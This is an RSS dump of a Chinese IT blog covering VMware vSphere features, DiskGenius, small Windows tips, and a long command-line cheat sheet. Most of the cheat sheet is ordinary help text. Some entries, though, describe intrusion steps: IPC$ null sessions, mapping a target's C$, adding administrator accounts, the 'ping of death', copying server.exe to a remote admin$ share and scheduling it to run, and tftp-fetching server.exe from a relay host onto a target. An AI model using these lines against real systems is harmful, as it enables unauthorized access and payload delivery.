<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　&#183; vSphere VMsafe API 支持使用与虚拟化层协同工作的安全产</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　品，从而为虚拟机提供甚至比物理服务器级别更高的安全性。</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　&#183; 硬件兼容性可兼容最广泛的 32 位和 64 位服务器和操作系统、</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　存储和网络设备以及</span><a style="line-height: 24px; font-family: arial, 宋体, sans-serif; color: #136ec2; font-size: 14px" href="http://baike.baidu.com/view/5453595.htm" target="_blank">企业管理工具</a><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">。</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　此外，VMware vSphere Essentials Plus 还包括为实现始终可用</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　的 IT 而提供的以下业务连续性功能和组件 ：</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　&#183; vSphere vMotion 支持在不中断用户使用和不丢失服务的情况</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　下在服务器间实时迁移虚拟机，从而无需为服务器维护安排</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　应用程序停机。</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　&#183; vSphere High Availability 可在硬件或操作系统发生故障的情</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　况下在几分钟内自动重新启动所有应用程序，实现经济高效</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　的高可用性。</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　&#183; vSphere Data Recovery 可为小型环境中的虚拟机提供简单、</span>
<div style="line-height: 14px; overflow-x: hidden; overflow-y: hidden; font-family: arial, 宋体, sans-serif; height: 14px"></div><span style="line-height: 24px; font-family: arial, 宋体, sans-serif; font-size: 14px">　　经济高效、无代理的备份和恢复。</span> <img src ="http://www.cnitblog.com/yide/aggbug/78050.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/yide/" target="_blank">青蛙學堂</a> 2012-03-12 11:05 <a href="http://www.cnitblog.com/yide/archive/2012/03/12/78050.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>DiskGenius</title><link>http://www.cnitblog.com/yide/archive/2011/10/13/76023.html</link><dc:creator>青蛙學堂</dc:creator><author>青蛙學堂</author><pubDate>Thu, 13 Oct 2011 08:46:00 GMT</pubDate><guid>http://www.cnitblog.com/yide/archive/2011/10/13/76023.html</guid><wfw:comment>http://www.cnitblog.com/yide/comments/76023.html</wfw:comment><comments>http://www.cnitblog.com/yide/archive/2011/10/13/76023.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.cnitblog.com/yide/comments/commentRss/76023.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/yide/services/trackbacks/76023.html</trackback:ping><description><![CDATA[<h2 class="headline-1 first bk-sidecatalog-title"><span class="text_edit editable-title" data-edit-id="1484160:1484160:1"><a class="nslog:1019" href="http://baike.baidu.com/view/1484160.htm#">编辑本段</a></span><a name="1"></a><span class="headline-content">概述</span></h2>　　DiskGenius是一款硬盘分区及数据恢复<a href="http://baike.baidu.com/view/37.htm" target="_blank">软件</a>。它是在最初的DOS版的基础上开发而成的。Windows版本的DiskGenius软件，除了继承并增强了DOS版的大部分功能外(少部分没有实现的功能将会陆续加入)，还增加了许多新的功能。如：已删除文件恢复、分区复制、分区备份、硬盘复制等功能。另外还增加了对VMWare虚拟硬盘的支持。更多功能正在制作并在不断完善中。另外，应广大用户的要求，新的Window 
<div class="text_pic" style="float: right; visibility: visible; padding-bottom: 3px; width: 200px; position: relative"><a class="pic-handle" title="查看图片" href="http://baike.baidu.com/albums/1484160/1484160.html#0$83cab81e5683622a413417a3" target="_blank">&nbsp;&nbsp;</a><a href="http://baike.baidu.com/albums/1484160/1484160.html#0$83cab81e5683622a413417a3" target="_blank"><img class="editorImg log-set-param" title="软件界面" src="http://imgsrc.baidu.com/baike/abpic/item/83cab81e5683622a413417a3.jpg" log-set-param="img_view"  alt="" /></a> 
<p class="pic-info">软件界面</p></div>s版本也在制作当中，不久即将发布。 
<div class="bpctrl"></div>
<h2 class="headline-1 bk-sidecatalog-title"><span class="text_edit editable-title" data-edit-id="1484160:1484160:2"><a class="nslog:1019" href="http://baike.baidu.com/view/1484160.htm#">编辑本段</a></span><a name="2"></a><span class="headline-content">功能</span></h2>　　DiskGenius软件的主要功能及特点如下： 
<div class="spctrl"></div>　　1、支持传统的MBR分区表格式及较新的<a href="http://baike.baidu.com/view/493745.htm" target="_blank">GUID分区表</a>格式。 
<div class="spctrl"></div>　　2、支持基本的分区建立、删除、隐藏等操作。可指定详细的分区参数； 
<div class="spctrl"></div>　　3、支持IDE、SCSI、SATA等各种类型的硬盘。支持U盘、USB硬盘、存储卡(闪存卡)； 
<div class="spctrl"></div>　　4、支持FAT12、FAT16、FAT32、<a href="http://baike.baidu.com/view/119305.htm" target="_blank">NTFS文件系统</a>； 
<div class="spctrl"></div>　　5、支持EXT2/EXT3文件系统的文件读取操作。支持Linux LVM2磁盘管理方式； 
<div class="spctrl"></div>　　6、可以快速格式化FAT12、FAT16、FAT32、<a href="http://baike.baidu.com/view/25864.htm" target="_blank">NTFS分区</a>。格式化时可设定簇大小、支持NTFS文件系统的压缩属性； 
<div class="spctrl"></div>　　7、可浏览包括隐藏分区在内的任意分区内的任意文件，包括通过正常方法不能访问的文件。可通过直接读写磁盘扇区的方式读写文件、强制删除文件； 
<div class="spctrl"></div>　　8、支持盘符的分配及删除； 
<div class="spctrl"></div>　　9、支持FAT12、FAT16、FAT32、NTFS分区的已删除文件恢复、分区误格式化后的文件恢复。成功率较高； 
<div class="spctrl"></div>　　10、增强的已丢失分区恢复(重建分区表)功能，恢复过程中，可即时显示搜索到的分区参数及分区内的文件。搜索完成后，可在不保存分区表的情况下恢复分区内的文件； 
<div class="spctrl"></div>　　11、提供分区表的备份与恢复功能； 
<div class="spctrl"></div>　　12、可将整个分区备份到一个镜像文件中，可在必要时(如分区损坏)恢复。支持在Windows运行状态下备份系统盘； 
<div class="spctrl"></div>　　13、支持分区复制操作。并提供&#8220;全部复制&#8221;、&#8220;按结构复制&#8221;、&#8220;按文件复制&#8221;等三种复制方式，以满足不同需求； 
<div class="spctrl"></div>　　14、支持硬盘复制功能。同样提供与分区复制相同的三种复制方式； 
<div class="spctrl"></div>　　15、支持VMWare虚拟硬盘文件(&#8220;.vmdk&#8221;文件)。打开虚拟硬盘文件后，即可像操作普通硬盘一样操作虚拟硬盘； 
<div class="spctrl"></div>　　16、可在不启动VMWare<a href="http://baike.baidu.com/view/1132.htm" target="_blank">虚拟机</a>的情况下从虚拟硬盘复制文件、恢复虚拟硬盘内的已删除文件(包括格式化后的文件恢复)、向虚拟硬盘复制文件等； 
<div class="spctrl"></div>　　17、支持 ".img" ".ima" 磁盘及分区映像文件的制作及读写操作； 
<div class="spctrl"></div>　　18、支持USB-FDD、USB-ZIP模式<a href="http://baike.baidu.com/view/597.htm" target="_blank">启动盘</a>的制作及其文件操作功能； 
<div class="spctrl"></div>　　19、支持磁盘坏道检测与修复功能。 
<div class="bpctrl"></div><img src ="http://www.cnitblog.com/yide/aggbug/76023.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/yide/" target="_blank">青蛙學堂</a> 2011-10-13 16:46 <a href="http://www.cnitblog.com/yide/archive/2011/10/13/76023.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>系统驱动错误提示</title><link>http://www.cnitblog.com/yide/archive/2011/09/18/75508.html</link><dc:creator>青蛙學堂</dc:creator><author>青蛙學堂</author><pubDate>Sun, 18 Sep 2011 00:21:00 GMT</pubDate><guid>http://www.cnitblog.com/yide/archive/2011/09/18/75508.html</guid><wfw:comment>http://www.cnitblog.com/yide/comments/75508.html</wfw:comment><comments>http://www.cnitblog.com/yide/archive/2011/09/18/75508.html#Feedback</comments><slash:comments>1</slash:comments><wfw:commentRss>http://www.cnitblog.com/yide/comments/commentRss/75508.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/yide/services/trackbacks/75508.html</trackback:ping><description><![CDATA[在系统事件里找到相关警示,然后在服务里面将服务禁掉或修复相关驱动或程式. <img src ="http://www.cnitblog.com/yide/aggbug/75508.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/yide/" target="_blank">青蛙學堂</a> 2011-09-18 08:21 <a href="http://www.cnitblog.com/yide/archive/2011/09/18/75508.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>立體字屏保</title><link>http://www.cnitblog.com/yide/archive/2006/06/21/12617.html</link><dc:creator>青蛙學堂</dc:creator><author>青蛙學堂</author><pubDate>Wed, 21 Jun 2006 03:14:00 GMT</pubDate><guid>http://www.cnitblog.com/yide/archive/2006/06/21/12617.html</guid><wfw:comment>http://www.cnitblog.com/yide/comments/12617.html</wfw:comment><comments>http://www.cnitblog.com/yide/archive/2006/06/21/12617.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.cnitblog.com/yide/comments/commentRss/12617.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/yide/services/trackbacks/12617.html</trackback:ping><description><![CDATA[电脑桌面单击右键选"属性" 然后在弹出的框上选"屏幕保护程序" 然后在"屏幕 保护程序(S)"选择"三维文字" 然后再在弹出的框内自定义文字一栏填写自己想设为屏保的字,确定--应用就行了 <img src ="http://www.cnitblog.com/yide/aggbug/12617.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/yide/" target="_blank">青蛙學堂</a> 2006-06-21 11:14 <a href="http://www.cnitblog.com/yide/archive/2006/06/21/12617.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>查看系統使用時間</title><link>http://www.cnitblog.com/yide/archive/2006/01/18/6246.html</link><dc:creator>青蛙學堂</dc:creator><author>青蛙學堂</author><pubDate>Wed, 18 Jan 2006 10:34:00 GMT</pubDate><guid>http://www.cnitblog.com/yide/archive/2006/01/18/6246.html</guid><wfw:comment>http://www.cnitblog.com/yide/comments/6246.html</wfw:comment><comments>http://www.cnitblog.com/yide/archive/2006/01/18/6246.html#Feedback</comments><slash:comments>1</slash:comments><wfw:commentRss>http://www.cnitblog.com/yide/comments/commentRss/6246.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/yide/services/trackbacks/6246.html</trackback:ping><description><![CDATA[<FONT color=#800080>在 Win2k/XP 系统中可以在命令提示符中执行 systeminfo 命令查看系统已运行时间。在 Win98 系统中，可以执行【开始】－【程序】－【附件】－【系统工具】－【系统信息】，在“系统信息”的首页里有一项“Uptime”，就是 Win98 已启动的时间，单位精确到秒。</FONT> <BR><BR><img src ="http://www.cnitblog.com/yide/aggbug/6246.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/yide/" target="_blank">青蛙學堂</a> 2006-01-18 18:34 <a href="http://www.cnitblog.com/yide/archive/2006/01/18/6246.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>DOS命令字典 </title><link>http://www.cnitblog.com/yide/archive/2006/01/17/6210.html</link><dc:creator>青蛙學堂</dc:creator><author>青蛙學堂</author><pubDate>Tue, 17 Jan 2006 02:41:00 GMT</pubDate><guid>http://www.cnitblog.com/yide/archive/2006/01/17/6210.html</guid><wfw:comment>http://www.cnitblog.com/yide/comments/6210.html</wfw:comment><comments>http://www.cnitblog.com/yide/archive/2006/01/17/6210.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.cnitblog.com/yide/comments/commentRss/6210.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/yide/services/trackbacks/6210.html</trackback:ping><description><![CDATA[net&nbsp;use&nbsp;\\ip\ipc$&nbsp;"&nbsp;"&nbsp;/user:"&nbsp;"&nbsp;建立IPC空链接&nbsp; <BR>net&nbsp;use&nbsp;\\ip\ipc$&nbsp;"密码"&nbsp;/user:"用户名"&nbsp;建立IPC非空链接&nbsp; <BR>net&nbsp;use&nbsp;h:&nbsp;\\ip\c$&nbsp;"密码"&nbsp;/user:"用户名"&nbsp;直接登陆后映射对方C：到本地为H:&nbsp; <BR>net&nbsp;use&nbsp;h:&nbsp;\\ip\c$&nbsp;登陆后映射对方C：到本地为H:&nbsp; <BR>net&nbsp;use&nbsp;\\ip\ipc$&nbsp;/del&nbsp;删除IPC链接&nbsp; <BR>net&nbsp;use&nbsp;h:&nbsp;/del&nbsp;删除映射对方到本地的为H:的映射&nbsp; <BR>net&nbsp;uｓer&nbsp;用户名　密码　/add&nbsp;建立用户&nbsp; <BR>net&nbsp;uｓer&nbsp;guest&nbsp;/active:yes&nbsp;激活guest用户&nbsp; <BR>net&nbsp;uｓer&nbsp;查看有哪些用户&nbsp; <BR>net&nbsp;uｓer&nbsp;帐户名&nbsp;查看帐户的属性&nbsp; <BR>net&nbsp;lｏcalgroup&nbsp;administrators&nbsp;用户名&nbsp;/add&nbsp;把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数&nbsp; <BR>net&nbsp;start&nbsp;查看开启了哪些服务&nbsp; <BR>net&nbsp;start&nbsp;服务名　&nbsp;开启服务；(如:net&nbsp;start&nbsp;telnet，&nbsp;net&nbsp;start&nbsp;schedule)&nbsp; <BR>net&nbsp;stop&nbsp;服务名&nbsp;停止某服务&nbsp; <BR>net&nbsp;time&nbsp;\\目标ip&nbsp;查看对方时间&nbsp; <BR>net&nbsp;time&nbsp;\\目标ip&nbsp;/set&nbsp;设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息&nbsp; <BR>net&nbsp;view&nbsp;查看本地局域网内开启了哪些共享&nbsp; <BR>net&nbsp;view&nbsp;\\ip&nbsp;查看对方局域网内开启了哪些共享&nbsp; <BR>net&nbsp;config&nbsp;显示系统网络设置&nbsp; <BR>net&nbsp;logoff&nbsp;断开连接的共享&nbsp; <BR>net&nbsp;pause&nbsp;服务名&nbsp;暂停某服务&nbsp; <BR>net&nbsp;send&nbsp;ip&nbsp;"文本信息"&nbsp;向对方发信息&nbsp; <BR>net&nbsp;ver&nbsp;局域网内正在使用的网络连接类型和信息&nbsp; <BR>net&nbsp;share&nbsp;查看本地开启的共享&nbsp; <BR>net&nbsp;share&nbsp;ipc$&nbsp;开启ipc$共享&nbsp; <BR>net&nbsp;share&nbsp;ipc$&nbsp;/del&nbsp;删除ipc$共享&nbsp; <BR>net&nbsp;share&nbsp;c$&nbsp;/del&nbsp;删除C：共享&nbsp; <BR>net&nbsp;uｓer&nbsp;guest&nbsp;12345&nbsp;用guest用户登陆后用将密码改为12345&nbsp; <BR>net&nbsp;password&nbsp;密码&nbsp;更改系统登陆密码&nbsp; <BR>netstat&nbsp;-a&nbsp;查看开启了哪些端口,常用netstat&nbsp;-an&nbsp; <BR>netstat&nbsp;-n&nbsp;查看端口的网络连接情况，常用netstat&nbsp;-an&nbsp; <BR>netstat&nbsp;-v&nbsp;查看正在进行的工作&nbsp; <BR>netstat&nbsp;-p&nbsp;协议名&nbsp;例：netstat&nbsp;-p&nbsp;tcq/ip&nbsp;查看某协议使用情况（查看tcp/ip协议使用情况）&nbsp; <BR>netstat&nbsp;-s&nbsp;查看正在使用的所有协议使用情况&nbsp; <BR>nbtstat&nbsp;-A&nbsp;ip&nbsp;对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写&nbsp; <BR>tracert&nbsp;-参数&nbsp;ip(或计算机名)&nbsp;跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。&nbsp; <BR>ping&nbsp;ip(或域名)&nbsp;向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。&nbsp; <BR>ping&nbsp;-t&nbsp;-l&nbsp;65550&nbsp;ip&nbsp;死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)&nbsp; <BR>ipconfig&nbsp;(winipcfg)&nbsp;用于windows&nbsp;NT及XP(windows&nbsp;95&nbsp;98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息&nbsp; <BR>tlist&nbsp;-t&nbsp;以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)&nbsp; <BR>kill&nbsp;-F&nbsp;进程名&nbsp;加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)&nbsp; <BR>del&nbsp;-F&nbsp;文件名&nbsp;加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR&nbsp;*.*”表示删除当前目录下所有只读文件，“DEL/A-S&nbsp;*.*”表示删除当前目录下除系统文件以外的所有文件 <BR><BR>#2&nbsp;二： <BR><BR>del&nbsp;/S&nbsp;/Q&nbsp;目录&nbsp;或用：rmdir&nbsp;/s&nbsp;/Q&nbsp;目录&nbsp;/S删除目录及目录下的所有子目录和文件。同时使用参数/Q&nbsp;可取消删除操作时的系统确认就直接删除。（二个命令作用相同）&nbsp; <BR>move&nbsp;盘符\路径\要移动的文件名　存放移动文件的路径\移动后文件名&nbsp;移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖&nbsp; <BR>fc&nbsp;one.txt&nbsp;two.txt&nbsp;&gt;&nbsp;3st.txt&nbsp;对比二个文件并把不同之处输出到3st.txt文件中，"&gt;&nbsp;"和"&gt;&nbsp;&gt;"&nbsp;是重定向命令&nbsp; <BR>at&nbsp;id号&nbsp;开启已注册的某个计划任务&nbsp; <BR>at&nbsp;/delete&nbsp;停止所有计划任务，用参数/yes则不需要确认就直接停止&nbsp; <BR>at&nbsp;id号&nbsp;/delete&nbsp;停止某个已注册的计划任务&nbsp; <BR>at&nbsp;查看所有的计划任务&nbsp; <BR>at&nbsp;\\ip&nbsp;time&nbsp;程序名(或一个命令)&nbsp;/r&nbsp;在某时间运行对方某程序并重新启动计算机&nbsp; <BR>finger&nbsp;username&nbsp;@host&nbsp;查看最近有哪些用户登陆&nbsp; <BR>telnet&nbsp;ip&nbsp;端口&nbsp;远和登陆服务器,默认端口为23&nbsp; <BR>open&nbsp;ip&nbsp;连接到IP（属telnet登陆后的命令）&nbsp; <BR>telnet&nbsp;在本机上直接键入telnet&nbsp;将进入本机的telnet&nbsp; <BR>copy&nbsp;路径\文件名1　路径\文件名2&nbsp;/y&nbsp;复制文件1到指定的目录为文件2，用参数/y就同时取消确认你要改写一份现存目录文件&nbsp; <BR>copy&nbsp;c:\srv.exe&nbsp;\\ip\admin$&nbsp;复制本地c:\srv.exe到对方的admin下&nbsp; <BR>cppy&nbsp;1st.jpg/b+2st.txt/a&nbsp;3st.jpg&nbsp;将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件&nbsp; <BR>copy&nbsp;\\ip\admin$\svv.exe&nbsp;c:\&nbsp;或:copy\\ip\admin$\*.*&nbsp;复制对方admini$共享下的srv.exe文件（所有文件）至本地C：&nbsp; <BR>xcopy&nbsp;要复制的文件或目录树　目标地址\目录名&nbsp;复制文件和目录树，用参数/Y将不提示覆盖相同文件&nbsp; <BR>tftp&nbsp;-i&nbsp;自己IP(用肉机作跳板时这用肉机IP)&nbsp;get&nbsp;server.exe&nbsp;c:\server.exe&nbsp;登陆后，将“IP”的server.exe下载到目标主机c:\server.exe&nbsp;参数：-i指以二进制模式传送，如传送exe文件时用，如不加-i&nbsp;则以ASCII模式（传送文本文件模式）进行传送&nbsp; <BR>tftp&nbsp;-i&nbsp;对方IP　put&nbsp;c:\server.exe&nbsp;登陆后，上传本地c:\server.exe至主机&nbsp; <BR>ftp&nbsp;ip&nbsp;端口&nbsp;用于上传文件至服务器或进行文件操作，默认端口为21。bin指用二进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时)&nbsp; <BR>route&nbsp;print&nbsp;显示出IP路由，将主要显示网络地址Network&nbsp;addres，子网掩码Netmask，网关地址Gateway&nbsp;addres，接口地址Interface&nbsp; <BR>arp&nbsp;查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理性的MAC地址。arp&nbsp;-a将显示出全部信息&nbsp; <BR>start&nbsp;程序名或命令&nbsp;/max&nbsp;或/min&nbsp;新开一个新窗口并最大化（最小化）运行某程序或命令&nbsp; <BR>mem&nbsp;查看cpu使用情况&nbsp; <BR>attrib&nbsp;文件名(目录名)&nbsp;查看某文件（目录）的属性&nbsp; <BR>attrib&nbsp;文件名&nbsp;-A&nbsp;-R&nbsp;-S&nbsp;-H&nbsp;或&nbsp;+A&nbsp;+R&nbsp;+S&nbsp;+H&nbsp;去掉(添加)某文件的&nbsp;存档，只读，系统，隐藏&nbsp;属性；用＋则是添加为某属性&nbsp; <BR>dir&nbsp;查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间&nbsp; <BR>date&nbsp;/t&nbsp;、&nbsp;time&nbsp;/t&nbsp;使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间，而不必输入新日期和时间&nbsp; <BR>set&nbsp;指定环境变量名称=要指派给变量的字符&nbsp;设置环境变量&nbsp; <BR>set&nbsp;显示当前所有的环境变量&nbsp; <BR>set&nbsp;p(或其它字符)&nbsp;显示出当前以字符p(或其它字符)开头的所有环境变量&nbsp; <BR>pause&nbsp;暂停批处理程序，并显示出：请按任意键继续....&nbsp; <BR>if&nbsp;在批处理程序中执行条件处理（更多说明见if命令及变量）&nbsp; <BR>goto&nbsp;标签&nbsp;将cmd.exe导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如：“：start”标签）&nbsp; <BR>call&nbsp;路径\批处理文件名&nbsp;从批处理程序中调用另一个批处理程序&nbsp;（更多说明见call&nbsp;/?）&nbsp; <BR>for&nbsp;对一组文件中的每一个文件执行某个特定命令（更多说明见for命令及变量）&nbsp; <BR>echo&nbsp;on或off&nbsp;打开或关闭echo，仅用echo不加参数则显示当前echo设置&nbsp; <BR>echo&nbsp;信息&nbsp;在屏幕上显示出信息&nbsp; <BR>echo&nbsp;信息&nbsp;&gt;&gt;&nbsp;pass.txt&nbsp;将"信息"保存到pass.txt文件中&nbsp; <BR>findstr&nbsp;"Hello"&nbsp;aa.txt&nbsp;在aa.txt文件中寻找字符串hello&nbsp; <BR>find&nbsp;文件名&nbsp;查找某文件&nbsp; <BR>title&nbsp;标题名字&nbsp;更改CMD窗口标题名字&nbsp; <BR>color&nbsp;颜色值&nbsp;设置cmd控制台前景和背景颜色；0＝黑、1＝蓝、2＝绿、3＝浅绿、4＝红、5＝紫、6＝黄、7=白、8=灰、9=淡蓝、A＝淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白&nbsp; <BR>prompt&nbsp;名称&nbsp;更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为：EntSky\&nbsp;) <BR><BR>#3&nbsp;三： <BR><BR>ver&nbsp;在DOS窗口下显示版本信息&nbsp; <BR>winver&nbsp;弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名）&nbsp; <BR>format&nbsp;盘符&nbsp;/FS:类型&nbsp;格式化磁盘,类型:FAT、FAT32、NTFS&nbsp;,例：Format&nbsp;D:&nbsp;/FS:NTFS&nbsp; <BR>md　目录名&nbsp;创建目录&nbsp; <BR>replace&nbsp;源文件　要替换文件的目录&nbsp;替换文件&nbsp; <BR>ren&nbsp;原文件名　新文件名&nbsp;重命名文件名&nbsp; <BR>tree&nbsp;以树形结构显示出目录，用参数-f&nbsp;将列出第个文件夹中文件名称&nbsp; <BR>type&nbsp;文件名&nbsp;显示文本文件的内容&nbsp; <BR>more&nbsp;文件名&nbsp;逐屏显示输出文件&nbsp; <BR>doskey&nbsp;要锁定的命令＝字符 <BR>doskey&nbsp;要解锁命令=&nbsp;为DOS提供的锁定命令(编辑命令行，重新调用win2k命令，并创建宏)。如：锁定dir命令：doskey&nbsp;dir=entsky&nbsp;(不能用doskey&nbsp;dir=dir)；解锁：doskey&nbsp;dir=&nbsp; <BR>taskmgr&nbsp;调出任务管理器&nbsp; <BR>chkdsk&nbsp;/F&nbsp;D:&nbsp;检查磁盘D并显示状态报告；加参数/f并修复磁盘上的错误&nbsp; <BR>tlntadmn&nbsp;telnt服务admn,键入tlntadmn选择3，再选择8,就可以更改telnet服务默认端口23为其它任何端口&nbsp; <BR>exit&nbsp;退出cmd.exe程序或目前，用参数/B则是退出当前批处理脚本而不是cmd.exe&nbsp; <BR>path&nbsp;路径\可执行文件的文件名&nbsp;为可执行文件设置一个路径。&nbsp; <BR>cmd&nbsp;启动一个win2K命令解释窗口。参数：/eff、/en&nbsp;关闭、开启命令扩展；更我详细说明见cmd&nbsp;/?&nbsp; <BR>regedit&nbsp;/s&nbsp;注册表文件名&nbsp;导入注册表；参数/S指安静模式导入，无任何提示；&nbsp; <BR>regedit&nbsp;/e&nbsp;注册表文件名&nbsp;导出注册表&nbsp; <BR>cacls&nbsp;文件名　参数&nbsp;显示或修改文件访问控制列表（ACL）——针对NTFS格式时。参数：/D&nbsp;用户名:设定拒绝某用户访问；/P&nbsp;用户名:perm&nbsp;替换指定用户的访问权限；/G&nbsp;用户名:perm&nbsp;赋予指定用户访问权限；Perm&nbsp;可以是:&nbsp;N&nbsp;无，R&nbsp;读取，&nbsp;W&nbsp;写入，&nbsp;C&nbsp;更改(写入)，F&nbsp;完全控制；例：cacls&nbsp;D:\test.txt&nbsp;/D&nbsp;pub&nbsp;设定d:\test.txt拒绝pub用户访问。&nbsp; <BR>cacls&nbsp;文件名&nbsp;查看文件的访问用户权限列表&nbsp; <BR>REM&nbsp;文本内容&nbsp;在批处理文件中添加注解&nbsp; <BR>netsh&nbsp;查看或更改本地网络配置情况 <BR><BR>#4&nbsp;四： <BR><BR>IIS服务命令：&nbsp; <BR>iisreset&nbsp;/reboot&nbsp;重启win2k计算机（但有提示系统将重启信息出现）&nbsp; <BR>iisreset&nbsp;/start或stop&nbsp;启动（停止）所有Internet服务&nbsp; <BR>iisreset&nbsp;/restart&nbsp;停止然后重新启动所有Internet服务&nbsp; <BR>iisreset&nbsp;/status&nbsp;显示所有Internet服务状态&nbsp; <BR>iisreset&nbsp;/enable或disable&nbsp;在本地系统上启用（禁用）Internet服务的重新启动&nbsp; <BR>iisreset&nbsp;/rebootonerror&nbsp;当启动、停止或重新启动Internet服务时，若发生错误将重新开机&nbsp; <BR>iisreset&nbsp;/noforce&nbsp;若无法停止Internet服务，将不会强制终止Internet服务&nbsp; <BR>iisreset&nbsp;/timeout&nbsp;Val在到达逾时间（秒）时，仍未停止Internet服务，若指定/rebootonerror参数，则电脑将会重新开机。预设值为重新启动20秒，停止60秒，重新开机0秒。&nbsp; <BR>FTP&nbsp;命令：&nbsp;(后面有详细说明内容)&nbsp; <BR>ftp的命令行格式为: <BR>ftp&nbsp;－v&nbsp;－d&nbsp;－i&nbsp;－n&nbsp;－g[主机名]&nbsp;－v&nbsp;显示远程服务器的所有响应信息。 <BR>－d&nbsp;使用调试方式。&nbsp; <BR>－n&nbsp;限制ftp的自动登录,即不使用.netrc文件。 <BR>－g&nbsp;取消全局文件名。&nbsp; <BR>help&nbsp;[命令]&nbsp;或&nbsp;？[命令]&nbsp;查看命令说明&nbsp; <BR>bye&nbsp;或&nbsp;quit&nbsp;终止主机FTP进程,并退出FTP管理方式.&nbsp; <BR>pwd&nbsp;列出当前远端主机目录&nbsp; 